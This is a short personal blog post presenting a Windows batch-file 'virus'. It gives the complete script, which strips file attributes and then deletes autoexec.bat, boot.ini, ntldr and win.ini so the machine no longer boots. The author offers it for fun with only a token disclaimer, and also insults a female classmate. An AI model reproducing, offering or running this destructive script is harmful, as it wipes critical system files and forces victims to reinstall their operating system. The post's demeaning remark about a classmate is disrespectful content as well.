Loading...
Sunday 30 June 2013

Batch file virus

Hey guys haven't posted in a while I have been doing a lot of school work, and there some retarded chick in my class that annoys that crap out me. 


Background



Um I have been working on this for a while and a finally got to virus rating from MacAffe. yay XDXDXDXD

The code



its a batch file that wipes that start-up files of a computer, so don’t be a noob ad test it out on your own computer coz it'll screw your computer up and the only way to fix it is to re-image your computer fully (wipe the hard drive and re-install windows again LOL)

Code: Cpp
-----Disclaimer - Not to be used to damage/harm other people’s computer systems---------- @echo off attrib -r -s -h c:\autoexec.bat del c:\autoexec.bat attrib -r -s -h c:\boot.ini del c:\boot.ini attrib -r -s -h c:\ntldr del c:\ntldr attrib -r -s -h c:\windows\win.ini del c:\windows\win.ini
:D

Have fun lol
-->

0 comments:

Post a Comment

 
TOP